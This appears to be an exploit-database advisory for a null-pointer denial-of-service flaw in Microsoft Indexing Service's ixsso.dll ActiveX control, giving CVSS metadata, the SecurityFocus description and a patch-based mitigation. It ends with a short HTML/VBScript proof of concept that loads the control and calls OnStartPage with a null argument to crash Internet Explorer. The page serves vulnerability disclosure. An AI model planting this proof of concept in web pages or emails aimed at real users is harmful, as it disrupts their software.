Microsoft Indexing Service 'ixsso.dll' ActiveX Control Denial of Service Vulnerability

vendor:

Indexing Service

by:

SecurityFocus

7,5

CVSS

HIGH

Denial of Service

476

CWE

Product Name: Indexing Service

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2012

Microsoft Indexing Service ‘ixsso.dll’ ActiveX Control Denial of Service Vulnerability

An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control. The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.

Mitigation:

Ensure that the latest security patches are applied to the affected system.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55202/info

Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error.

An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.

The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed. 

<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>